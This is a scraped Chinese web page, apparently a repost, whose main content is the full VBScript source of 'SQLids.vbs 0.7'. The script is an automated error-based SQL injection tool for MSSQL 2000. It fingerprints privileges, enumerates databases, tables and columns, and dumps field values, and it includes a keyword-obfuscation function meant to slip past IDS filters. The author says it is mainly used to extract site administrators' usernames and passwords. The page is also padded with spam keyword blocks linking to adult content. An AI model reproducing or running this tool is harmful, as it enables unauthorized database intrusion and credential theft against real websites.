婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > SQLids.vbs 0.7(最終版,以后改成gui界面的)

SQLids.vbs 0.7(最終版,以后改成gui界面的)

熱門標(biāo)簽:新密防封卡外呼系統(tǒng)違法嗎 百度地圖標(biāo)注怎么卸載 海外美發(fā)店地圖標(biāo)注 外呼營銷下單系統(tǒng) 打電話的外呼系統(tǒng)貴不貴 辦理膠州400電話財(cái)稅 前鋒辦理400電話申請 加盟電銷機(jī)器人好的品牌 陜西高頻外呼回?fù)芟到y(tǒng)哪家好

是有這個問題的。
第一,應(yīng)當(dāng)用正則判斷較好。
第二,我用循環(huán)加返回結(jié)果大于30個長度就退出循環(huán),我相信沒有表名和字段名大于30個字母的,但是字段值有可能大于,這個地方解決的不夠好。但是一般是用來查后臺的管理員的用戶名和密碼,所以就放棄了。

set arg=wscript.arguments 

If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then 
Wscript.Quit 
End If 
if arg.count=0 then 
usage() 
Wscript.Quit 
End If 

Sub usage() 
wsh.echo string(79,"*") 
wsh.echo "暫且只支持mssql顯錯模式,直接寫url為數(shù)字型,寫url'為字符型,url里有請用雙引號包含url" 
wsh.echo "sqlids v0.7 for mssql2000 with error by lcx" 
wsh.echo "以下兩個腳本可互相參考" 
wsh.echo "http://www.jb51.net/article/14172.htm" 
wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html" 
wsh.echo "Usage:" 
wsh.echo "cscript "wscript.scriptname" url limit ||----------->得到當(dāng)前權(quán)限"vbcrlf"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit" 
wsh.echo "cscript "wscript.scriptname" url dbname ||----------->得到全部庫名"vbcrlf"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname" 
wsh.echo "cscript "wscript.scriptname" url table 庫名||-------->得到所給庫的全部表名"vbcrlf"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table 
master" 
wsh.echo "cscript "wscript.scriptname" url filed 庫名 表名 ||---------->得到所給庫所給表的全部字段"vbcrlf"Ex:cscript sql.vbs http://ww.x.com/1.asp? 
id=1 filed master spt_server_info" 
wsh.echo "cscript "wscript.scriptname" url result 字段名 庫名 表名||--->得所給庫、表、字段的字段值"vbcrlf"Ex:cscript sql.vbs http://ww.x.com/1.asp? 
id=1 result id master sysinfo" 
wsh.echo "cscript "wscript.scriptname" url search 你要查找的字段名||--->根據(jù)關(guān)鍵字查找字段"vbcrlf"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search 
pass" 
wsh.echo string(79,"*")vbcrlf 
end Sub 


Function getHTTPPage(Path) 
t = GetBody(Path) 
getHTTPPage = BytesToBstr(t, "GB2312") 
End Function 

Function UrlEncode(str) 
str = Replace(str," ","%20") 
UrlEncode = str 
End Function 

Function GetBody(url)' xml得到網(wǎng)頁源碼,可以改成cookie或get提交 
On Error Resume Next 
Aurl=Split(url,"?") '這是為post提交的 
Set Retrieval = CreateObject("Microsoft.XMLHTTP") 
With Retrieval 
.Open "post", Aurl(0), False, "", "" 
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded" 
.setRequestHeader "Accept-Encoding", "gzip, deflate" 
.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 
3.0.04506; .NET CLR 1.1.4322)" 
.setRequestHeader "Connection", "Keep-Alive" 
.setRequestHeader "Cache-Control", "no-cache" 
.Send UrlEncode(Aurl(1)) 'post提交 
GetBody = .ResponseBody 
.abort 
End With 
Set Retrieval = Nothing 
End Function 


Function BytesToBstr(Body, Cset) 
Dim objstream 
Set objstream = CreateObject("adodb.stream") 
objstream.Type = 1 
objstream.Mode = 3 
objstream.Open 
objstream.Write Body 
objstream.Position = 0 
objstream.Type = 2 
objstream.Charset = Cset 
BytesToBstr = objstream.ReadTExt 
objstream.Close 
Set objstream = Nothing 
End Function 


Function ReplaceKeyWord(Value)'繞過ids過慮 
Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in% 
ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown- 
>shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har| 
[k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k] 
|sp_->s%p_|[k]|and->a%nd" 
Dim i, Relpacement, Temp 
Relpacement = Split(Table, "|[k]|") 
ReplaceKeyWord = Value 
For i = 0 to UBound(Relpacement) 
Temp = Split(Relpacement(i), "->") 
If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1)) 
NExt 
End Function 


Function result(sHTMLTEMP) '用varchar做關(guān)鍵字分隔網(wǎng)頁內(nèi)容,用正則帥一點(diǎn),可惜不太會 
aHTML = Split(sHTMLTEMP, "varchar") 
If(UBound(aHTML) > 0)Then 
sHTMLTEMP = aHTML(1) 
aHTML = Split(sHTMLTEMP, "'") 
sHTMLTEMP = aHTML(1) 
End If 
result=sHTMLTEMP 
End Function 

Function Str2HEx(strHEx)'sql的16進(jìn)制轉(zhuǎn)換函數(shù) 
Dim sHEx 
For i = 1 To Len(strHEx) 
sHEx = sHEx  HEx(Asc(Mid(strHEx,i,1)))"00" 
NExt 
Str2HEx = "0x"sHEx 
End Function 

Function Str2HExtwo(strHEx)'sql的16進(jìn)制轉(zhuǎn)換函數(shù) 
Dim sHEx 
For i = 1 To Len(strHEx) 
sHEx = sHEx  HEx(Asc(Mid(strHEx,i,1))) 
NExt 
Str2HExtwo = "0x"sHEx 
End Function 


Function MoveR(Rstr) '去重復(fù) 
Dim i,SpStr 
SpStr = Split(Rstr,",") 
For i = 0 To Ubound(Spstr) 
If I = 0 then 
MoveR = MoveR  SpStr(i)  "," 
Else 
If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then 
MoveR = MoveR  SpStr(i) 
Elseif instr(MoveR,SpStr(i))=0 Then 
MoveR = MoveR  SpStr(i)  "," 
End If 
End If 
NExt 
End Function 


function page(sql) 
page=Replace(getHTTPPage(url" "ReplaceKeyWord(sql)),Chr(34),"") 
End Function 

url=arg(0) 

injection =arg(1) 


'--------------------------------------以下代碼是注入語句,完全不需要引號 
select case arg(1) 

Case "limit" 
body=Replace(getHTTPPage(url),Chr(34),"") 
'語句單獨(dú)提出來,方便以后修改,第一條是sa,第二條是DB_owner 
sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--" 
sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--" 
Bodyone=page(sqlone) 
bodytwo=page(sqltwo) 
wsh.echo "當(dāng)前信息:" 
If Len(body)=Len(Bodyone) Then wsh.echo "SA" 

If Len(body)=Len(Bodytwo) And Len(body)>Len(Bodyone) Then 
wsh.echo "DB_owner" 
Else 
wsh.echo "PUBLIC" 
End If 

sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--" 
rtemp=Split(sqlthtree,"|") 
servername=result(page(rtemp(0))) 
version=result(page(rtemp(1))) 
user=result(page(rtemp(2))) 
db_name=result(page(rtemp(3))) 
wsh.echo "servername:"servername 
wsh.echo "version:"version 
wsh.echo "user:" user 
wsh.echo "db_name:" db_name 

case "dbname" 
i=1 
Do 
sql="and db_name("i")>0--" '暴庫名語句 
Body = page(sql) 
k=InstrRev(body,"varchar", -1, 0) 
i=i+1 
If k>0 Then 
wscript.echo result(body) 
Else 
wsh.echo "========over============" 
End if 
Loop Until k=0 

case "table" 
i=1 
Do 
' 表名語句 agr(2)表示庫 
sql="and 0>(select top 1 name from "arg(2)".dbo.sysobjects where xtype=0x7500 and name not in (select top " i " name from "arg(2)".dbo.sysobjects 
where xtype=0x7500))--" 
Body = page(sql) 
k=InstrRev(body,"varchar", -1, 0) 
i=i+1 
If k>0 Then 
wscript.echo result(body) 
Else 
wsh.echo "========over============" 
End if 
Loop Until k=0 

case "filed" 
sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["arg(2)"]..[sy%sob%je%cts] wh%ere name="Str2HEx(arg(3))")=0-- 
" 
biaoid=result(page(sqlbiaoid)) 
biaoid=Replace(biaoid,Chr(124),"") 
sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["arg(2)"]..[sys%columns] wh%ere id="biaoid")=0-- " 
k=Replace(result(page(sqlclounmcnt)),Chr(94),"") 
wsh.echo "共有列名"k"個" 
For i=1 To k 
sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "i" colid,name fr%om ["arg(2)"]..[sys%columns] wh%ere 
id="biaoid" order by colid) t order by colid desc)=0--" 
wsh.echo result(page(sqlfiled)) 
nExt 


case "result" 

i=1 
sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["arg(3)"]..["arg(4)"] where 1=1)>0--" '暴列的總數(shù)目語句 
k=result(page(sqlcloum)) 
k=Replace(k,Chr(94),"") 
wsh.echo arg(2)"字段共有記錄數(shù)"k"個"vbcrlf 
For i=1 To k 
sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st("arg(2)" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "i" ["arg(2)"] fr%om ["arg(3)"]..["arg(4) 
"] wh%ere 1=1 order by ["arg(2)"]) t wh%ere 1=1 order by ["arg(2)"] desc )=0--" 
Body = page(sqlneirong) 
wscript.echo Replace(result(body),Chr(94),"") 
Next 


Case "search" 
love=Str2HExtwo(arg(2)) 
wscript.echo "請稍候,正在查循,暫且只列10條,結(jié)果顯示為'表名|字段名'格式" 
TimeSpend = Timer 
For i=1 To 10 '可以根據(jù)需要改動這個10 
sqlsearch="And (select/* */top/* */1/* */t_name%2bchar(124)%2bc_name/* */from/* */(select/* */top/* */"i"/* */object_name(id)/* */as/* */t_name,name/* 
*/as/* */c_name/* */from/* */syscolumns/* */where/* */charindEx(cast("love"/* */as/* */varchar(2000)),name)%3E0/* */and/* */left(name,1)!=0x40/* */order/* 
*/by/* */t_name/* */asc)/* */as/* */T/* */order/* */by/* */t_name/* */desc)>0--" 
Body = page(sqlsearch) 
body=result(body) 
a=abody"," 
NExt 
TimeSpend = round(Timer - TimeSpend,2) 
wsh.echo MoveR(a) 
wsh.echo "用時:"  TimeSpend  "秒." 


Case Else 
If arg(1)>"limit" Or arg(1)>"dbname" Or arg(1)>"search" Or arg(1)>"table" Or arg(1)>"filed" Then 
wscript.echo "注意參數(shù)" 
usage() 
End if 
end select 

到此這篇關(guān)于SQLids.vbs 0.7(最終版,以后改成gui界面的)的文章就介紹到這了,更多相關(guān)SQLids內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

標(biāo)簽:河南 阜陽 咸陽 伊春 梅州 四平 武威 牡丹江

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《SQLids.vbs 0.7(最終版,以后改成gui界面的)》,本文關(guān)鍵詞  SQLids.vbs,0.7,最終,版,以后,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《SQLids.vbs 0.7(最終版,以后改成gui界面的)》相關(guān)的同類信息!
  • 本頁收集關(guān)于SQLids.vbs 0.7(最終版,以后改成gui界面的)的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    在线观看亚洲a| 一区二区三区四区蜜桃| 日本成人在线网站| 7777精品伊人久久久大香线蕉最新版| 亚洲一区二区不卡免费| 欧美性色黄大片| 日韩精品乱码免费| 精品区一区二区| 久久国产精品无码网站| 久久久三级国产网站| 国产精品一区二区黑丝| 国产亚洲va综合人人澡精品| 波多野结衣的一区二区三区| 亚洲欧美日韩国产综合| 欧美天堂一区二区三区| 日韩影院免费视频| 精品国产乱码久久久久久蜜臀| 韩国精品主播一区二区在线观看| 欧美国产精品一区二区三区| 99精品1区2区| 久久精品国产一区二区三区免费看| 久久夜色精品国产噜噜av| 9i看片成人免费高清| 亚洲精品久久7777| 日韩美女一区二区三区| 成人免费观看视频| 午夜精品福利久久久| 26uuu亚洲综合色| 91视频免费看| 毛片av一区二区| 成人欧美一区二区三区在线播放| 欧美系列在线观看| 国产一区二区三区观看| 一区二区三区四区视频精品免费| 日韩视频在线观看一区二区| 国产91对白在线观看九色| 亚洲狠狠爱一区二区三区| 国产日韩欧美一区二区三区乱码| 欧美性猛交一区二区三区精品 | 亚洲欧洲一区二区在线播放| 欧美日韩中文字幕一区| 国产伦精品一区二区三区在线观看| 亚洲人成在线观看一区二区| 欧美videos中文字幕| 欧美性感一区二区三区| 国产传媒一区在线| 蜜桃视频一区二区三区| 一区二区久久久久| 日本一区二区在线不卡| 欧美一级搡bbbb搡bbbb| 在线观看一区日韩| 成人h版在线观看| 国内精品国产三级国产a久久| 洋洋成人永久网站入口| 国产精品入口麻豆九色| 精品欧美久久久| 欧美一区二区视频免费观看| 一本大道久久精品懂色aⅴ | www.日韩大片| 国产综合一区二区| 日本怡春院一区二区| 亚洲国产欧美在线| 亚洲视频免费看| 国产午夜亚洲精品羞羞网站| 精品国产一区二区三区不卡| 欧美调教femdomvk| 欧美日韩国产小视频| 在线一区二区三区| 91免费观看在线| av一区二区三区| 成人av手机在线观看| 国产成人精品免费| 国产99精品在线观看| 成人在线综合网| 国产一本一道久久香蕉| 狠狠狠色丁香婷婷综合激情| 另类小说欧美激情| 精品一区二区三区在线播放视频 | 成人妖精视频yjsp地址| 国产精品综合视频| 成人久久18免费网站麻豆 | 亚洲综合在线观看视频| 亚洲欧美日韩久久精品| 亚洲综合自拍偷拍| 日本不卡视频在线| 久久精品国产亚洲a| 国产一区美女在线| 粉嫩aⅴ一区二区三区四区五区| 国产成人av自拍| 99久久99久久精品免费看蜜桃| 91色porny蝌蚪| 欧美影片第一页| 91精品国产一区二区三区蜜臀 | 欧美三级日韩三级| 717成人午夜免费福利电影| 日韩欧美一区二区三区在线| 欧美成人bangbros| 日本一区二区视频在线| 亚洲欧美日韩精品久久久久| 亚洲自拍偷拍欧美| 日本欧美一区二区三区乱码| 亚洲视频在线一区观看| 亚洲自拍偷拍九九九| 午夜免费欧美电影| 日韩成人午夜电影| 精品一区二区久久| 国产一区二区在线视频| 成人福利视频在线| 在线视频欧美精品| 91.com视频| 欧美另类变人与禽xxxxx| 7777精品伊人久久久大香线蕉| 欧美一区二区观看视频| 精品处破学生在线二十三| 久久久久国产免费免费| 精品理论电影在线| 日韩美女视频一区二区| 一区二区三区国产精品| 蜜臀av在线播放一区二区三区| 精品亚洲成a人在线观看| 国产盗摄一区二区三区| 国产精品一二三| 在线91免费看| 中文无字幕一区二区三区| 亚洲激情图片一区| 日韩国产高清在线| 成人午夜视频福利| 欧美一区二区女人| 中文字幕亚洲在| 奇米一区二区三区| 成人免费毛片aaaaa**| 色偷偷88欧美精品久久久| 欧美绝品在线观看成人午夜影视| 久久久久久久久蜜桃| 亚洲精品欧美专区| 日韩专区中文字幕一区二区| 六月婷婷色综合| 91浏览器打开| 亚洲精品一区二区在线观看| 亚洲精品国产无套在线观| 裸体一区二区三区| 色婷婷综合久久久中文字幕| 欧美成人精品1314www| 午夜av一区二区三区| 国产不卡视频在线播放| 91麻豆精品国产| 亚洲激情自拍偷拍| 丁香婷婷综合网| 国产亚洲精品超碰| 蜜臀久久99精品久久久久宅男| aa级大片欧美| 久久一区二区三区国产精品| 亚洲综合成人在线| 色呦呦日韩精品| 国产日产欧美一区二区三区| 性久久久久久久| 91色porny| 日韩免费观看高清完整版 | 亚洲国产精品尤物yw在线观看| 成人午夜电影小说| 精品国产区一区| 亚洲第一精品在线| 91国偷自产一区二区三区成为亚洲经典| 欧美国产丝袜视频| 国产精品小仙女| 26uuu精品一区二区| 日本美女视频一区二区| 欧美日韩激情在线| 日本欧美久久久久免费播放网| 日本高清不卡在线观看| 亚洲精品中文字幕乱码三区| 成人高清视频在线观看| 欧美一区二区三区精品| 久草这里只有精品视频| 666欧美在线视频| 亚洲午夜精品17c| 91久久久免费一区二区| 亚洲精品中文字幕乱码三区| 日本道精品一区二区三区| 亚洲色图.com| 国产精品一区二区三区网站| 中文字幕巨乱亚洲| 成人性生交大合| 国产精品卡一卡二卡三| 丰满白嫩尤物一区二区| 亚洲美腿欧美偷拍| 日本韩国欧美在线| 亚洲一区二区欧美日韩| 欧美性猛交一区二区三区精品 | 亚洲午夜精品在线| 欧美在线综合视频| 婷婷夜色潮精品综合在线| 欧美乱妇23p| 日韩和欧美一区二区| 精品少妇一区二区三区日产乱码 | 亚洲电影视频在线| 欧美一级理论性理论a| 久久精品99久久久| 国产色产综合色产在线视频| 成人国产精品免费网站|